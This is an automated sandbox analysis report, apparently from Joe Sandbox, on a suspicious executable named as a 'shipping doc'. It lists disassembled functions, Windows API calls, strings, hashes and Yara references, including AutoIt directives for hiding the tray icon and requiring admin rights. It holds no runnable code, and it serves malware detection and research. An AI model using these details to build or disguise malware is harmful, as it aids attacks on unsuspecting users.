Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: c448603c78c1b462b159e6a8a61be47ee820fffaa80f8b82bea6f0cc32ac3b2f
Instruction ID: 861dcea1326c7349c6b226bb595fe74c15d4eef7ea9b727d0fd929ea47c98bc2
Opcode Fuzzy Hash: c448603c78c1b462b159e6a8a61be47ee820fffaa80f8b82bea6f0cc32ac3b2f
Instruction Fuzzy Hash: A621BF32600229ABDF118F60CC42FEE3B76EB48724F150215FA596B1D0D6B5AC54EB90

Function 00FD4588 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FD463A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FD4648
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FD464F

Strings

msctls_updown32, xrefs: 00FD45B9

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 0a2a79c249f5a537893122b996738dcd8a02541f21176b2e0a95ab4fa72a7359
Instruction ID: 1bb7c948e56802d9f277fce5e381aba08af95126f04a38b64dee680cb31f15c6
Opcode Fuzzy Hash: 0a2a79c249f5a537893122b996738dcd8a02541f21176b2e0a95ab4fa72a7359
Instruction Fuzzy Hash: 572192B1604209AFDB10DF24DC81DB737AEEB5A3A4B08004AFA159B351CB35FC01EB60

Function 00FA94CB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FA953B

Strings

#notrayicon, xrefs: 00FA94D5
#requireadmin, xrefs: 00FA94F7
#OnAutoItStartRegister, xrefs: 00FA9511

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 22bbdaf323d1fc297afc42f9a6dce6d44052afe10a7410ebc3080e6afbdbaf25
Instruction ID: b848fc9f58d74d77c32aa3258403f94d8599a94e24cbd778047197c61c6a0faf
Opcode Fuzzy Hash: 22bbdaf323d1fc297afc42f9a6dce6d44052afe10a7410ebc3080e6afbdbaf25
Instruction Fuzzy Hash: 55212C729081115AC631F624DC03FAB73D9DF97360F588036FD4687181EBE59946B395

Function 00FD36EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FD3773
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FD3783
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FD37A9

Strings

Listbox, xrefs: 00FD3742

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 3e0fefc4284070fab5065a99342b9f05808fd675db6576160b5d88807848e344
Instruction ID: 958a617dcfe5b61a8a83600d2058d1402859da0fcdb3166eb707617442aebb88
Opcode Fuzzy Hash: 3e0fefc4284070fab5065a99342b9f05808fd675db6576160b5d88807848e344
Instruction Fuzzy Hash: B82107B26041187BEF118F64DC44FBB3B6FEF89760F048115FA449B290C671EC51A7A0

Function 00FB4912 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FB4926
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FB497A
SetErrorMode.KERNEL32(00000000,?,?,00FDD0D0), ref: 00FB49EE

Strings

%lu, xrefs: 00FB498D

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 85c2b54c0e630b7f717111e68a62443fbb0cd7fcbb2e9cb8727dba0e3330d5df
Instruction ID: 828eecf390309884eaa2e077018c2aad1d5d42cd1c68ac1fbf135a91754b0350
Opcode Fuzzy Hash: 85c2b54c0e630b7f717111e68a62443fbb0cd7fcbb2e9cb8727dba0e3330d5df
Instruction Fuzzy Hash: 2F318E71A00109AFDB00DF64C985EAA7BB9EF04308F148099E909DB362DB75EE46DB61

Function 00FD4120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FD4184
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FD4199
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FD41A6

Strings

msctls_trackbar32, xrefs: 00FD415B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: e1aa230ece72ef87c20c5fb8820cca196bdfd8609fb64e9511a2107854cb1a73
Instruction ID: 64ad0c0b8344ca8bbe5a59b71c32de0aa55e81d591d4b4f4be424bacf19a9852
Opcode Fuzzy Hash: e1aa230ece72ef87c20c5fb8820cca196bdfd8609fb64e9511a2107854cb1a73
Instruction Fuzzy Hash: 14112531240208BFEF215F39CC06FAB3BADEF95B64F010515FA95E62A0D671EC51AB60

Function 00FA2E95 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

Part of subcall function 00FA2CEB: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00FA2D09
Part of subcall function 00FA2CEB: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA2D1A
Part of subcall function 00FA2CEB: GetCurrentThreadId.KERNEL32 ref: 00FA2D21
Part of subcall function 00FA2CEB: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00FA2D28

GetFocus.USER32 ref: 00FA2EBB

Part of subcall function 00FA2D32: GetParent.USER32(00000000), ref: 00FA2D3D

GetClassNameW.USER32(?,?,00000100), ref: 00FA2F06
EnumChildWindows.USER32(?,00FA2F7E), ref: 00FA2F2E

Strings

%s%d, xrefs: 00FA2F42

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 7f101438301e33bc59c475d2c4a235de9e81aeae9e2cb33c3c85b633cc023dc1
Instruction ID: de60e7c9ab3cf89c62fefd94839c17ffdbf9e481565005e266e9ce15fc92c05f
Opcode Fuzzy Hash: 7f101438301e33bc59c475d2c4a235de9e81aeae9e2cb33c3c85b633cc023dc1
Instruction Fuzzy Hash: FC11B4B570020A6BCF50BF748C85EFD376AAF95324F044066FD09AB192CF34994AEB60

Function 00FD57B7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FD57F6
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FD5823
DrawMenuBar.USER32(?), ref: 00FD5832

Strings

0, xrefs: 00FD57C4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 16c53ac03a9b20a4fad832ebf137ae1e9bbb03b947f96106813c2a16817ae8a8
Instruction ID: a3658cec61786bec4b7045a12760b8a3eee44a64ad1ad3432077449c64a98a1d
Opcode Fuzzy Hash: 16c53ac03a9b20a4fad832ebf137ae1e9bbb03b947f96106813c2a16817ae8a8
Instruction Fuzzy Hash: E4018432900218AFDB109F50DC44BAE7BB6FF45751F18809AED49D6250DB348984FF21

Function 00F9DB3C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F9DB5B
FreeLibrary.KERNEL32 ref: 00F9DB81

Strings

GetSystemWow64DirectoryW, xrefs: 00F9DB55
X64, xrefs: 00F9DA44

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 4737bfc5d5776942df7ffd90e72482fc968460c3805c1e370598e72eeddf38e5
Instruction ID: a42cfa88792fdebf1fbf208bc7c15be139222f1eb10ec3b667d3620c870d21b2
Opcode Fuzzy Hash: 4737bfc5d5776942df7ffd90e72482fc968460c3805c1e370598e72eeddf38e5
Instruction Fuzzy Hash: 88E02272C075269BFF2686204C68BA93325AF00B11F29005AFE42F7142EB68CD89F284

Function 00FC3355 Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00FC3380
CoUninitialize.OLE32 ref: 00FC338A
VariantInit.OLEAUT32(?), ref: 00FC3395
VariantClear.OLEAUT32(?), ref: 00FC3642

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 26a95f57e9fe069ba2960a5543dab63bfe24020ae4d00e2cd28877e2de4fdb8c
Instruction ID: 30d3c55a70676e2ee15d11e5a20a7459752c6c6faa479a5dff02e8226366cf35
Opcode Fuzzy Hash: 26a95f57e9fe069ba2960a5543dab63bfe24020ae4d00e2cd28877e2de4fdb8c
Instruction Fuzzy Hash: 80A126756042019FC700EF64C986E2ABBE5BF89760F04885DF9899B361CB74ED01EB91

Function 00FA031F Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FDFC24,?), ref: 00FA04D9
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FDFC24,?), ref: 00FA04F1
CLSIDFromProgID.OLE32(?,?,00000000,00FDD108,000000FF,?,00000000,00000800,00000000,?,00FDFC24,?), ref: 00FA0516
_memcmp.LIBVCRUNTIME ref: 00FA0537

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 5d73946b6842d7b2dc32fc8e3f725a9592827f7241da9c5526d0fa04852d7e70
Instruction ID: eec9eee311f0f94764bf01154fc817066b380aa5c1a3e070c1e507ecb20d2d09
Opcode Fuzzy Hash: 5d73946b6842d7b2dc32fc8e3f725a9592827f7241da9c5526d0fa04852d7e70
Instruction Fuzzy Hash: 698119B1A0020AEFCB04DF94C984EEEB7B9FF89315F244559E506AB250DB71AE05DF60

Function 00F81331 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F81460

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9bc4d9a289fb8d2e54a29374dc0cdace1ab622cd53a3b6c21523ab8f9b724980
Instruction ID: 7e8731eed25a6fbe61a4e4c0b832de5f068f8fde128586a7f56a5af64519a49f
Opcode Fuzzy Hash: 9bc4d9a289fb8d2e54a29374dc0cdace1ab622cd53a3b6c21523ab8f9b724980
Instruction Fuzzy Hash: 1E411B31E00600ABEB21BBF99C85AEE3B6DFF46730F144326F418D61D1DA784846B762

Function 00FD6146 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0124E6E0,?), ref: 00FD61B0
ScreenToClient.USER32(?,?), ref: 00FD61E3
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00FD6250

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: d12383b1a54747fd9f61bb143c89b03036b67267ee068bdd97b33aa8764aebe7
Instruction ID: ec3f3a5056fca294499b6ccabed7971e3e3757643c0bcb302d4bf195ab2e0311
Opcode Fuzzy Hash: d12383b1a54747fd9f61bb143c89b03036b67267ee068bdd97b33aa8764aebe7
Instruction Fuzzy Hash: C9512B75A00209AFCF24DF68C880AAE7BB6FF55361F14815AF965DB390D730AD41EB90

Function 00FC19FD Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00FC1A24
WSAGetLastError.WSOCK32 ref: 00FC1A32
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FC1AB1
WSAGetLastError.WSOCK32 ref: 00FC1ABB

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: f082dcb1676cc09041bf5fab80c41fe5aa4509cc7135a600fd79e2405615b37d
Instruction ID: 9ef07b4ab2ce3e392b3d65415033727ebab19eed086dcab803d00f219b3c32b7
Opcode Fuzzy Hash: f082dcb1676cc09041bf5fab80c41fe5aa4509cc7135a600fd79e2405615b37d
Instruction Fuzzy Hash: 8E419F35A00201AFE720AF24C886F2A7BA5AF45714F54845CFA199F3D3D77AED42DB90

Function 00F7B3BF Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd30ff5f27b44b36577f176ce99813d3404c02d6a9a3e61118d9d07f29acf6
Instruction ID: 064678d453e27e8ccc03c81313b7a2f97d58462b20cdd005ccf40b6646164ee0
Opcode Fuzzy Hash: 80fd30ff5f27b44b36577f176ce99813d3404c02d6a9a3e61118d9d07f29acf6
Instruction Fuzzy Hash: 11412B71A00704AFD724EF38CC41BAA7BF9EB89720F10862FF105DB282D775A911A781

Function 00FB55F7 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FB56A1
GetLastError.KERNEL32(?,00000000), ref: 00FB56C7
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FB56EC
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FB5718

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 8ebfd0f918af52bd5a48c6dc1e2f32d7b8c13de79c7e3d3e98dfb80a3fa551da
Instruction ID: 654c77a034aa7d944a9192b5c9ca48a28be7644c4e68422b735e5e5e621c65f6
Opcode Fuzzy Hash: 8ebfd0f918af52bd5a48c6dc1e2f32d7b8c13de79c7e3d3e98dfb80a3fa551da
Instruction Fuzzy Hash: C9412C35600611DFCB11EF55C844A5DBBF2EF89720B188488ED4A9B362CB78FD02EB91

Function 00F7D863 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00F66D01,00000000,00000000,00F68269,?,00F68269,?,00000001,00F66D01,8BE85006,00000001,00F68269,00F68269), ref: 00F7D8B0
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F7D939
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F7D94B
__freea.LIBCMT ref: 00F7D954

Part of subcall function 00F737B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00F5FD75,?,?,00F4B63D,00000000,?,?,?,00FB106C,00FDD0D0,?,00F8242E), ref: 00F737E2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 21272c0d979c8e99d3187fdae70407ccee6ea72098990c9c64ec5d0d7d0299ad
Instruction ID: 8a0e53e62f5c48eb37a9717ec975b83ee68d0d1b044c18c7a313950d221072c9
Opcode Fuzzy Hash: 21272c0d979c8e99d3187fdae70407ccee6ea72098990c9c64ec5d0d7d0299ad
Instruction Fuzzy Hash: C831D232A0021AABDB259F64DC41EAE7BB5EF41320F04816AFD09D7190EB35DD50EBA1

Function 00FD51F6 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00FD5287
GetWindowLongW.USER32(?,000000F0), ref: 00FD52AA
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD52B7
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FD52DD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 72f4223fc569c65e0535c25f2e372cd28349750030db79a77b24b053135bc3f1
Instruction ID: 735fb74caf94eb5a6ea92ee20597ae1cc3cccd932da42b1d3c057a1b286cfa50
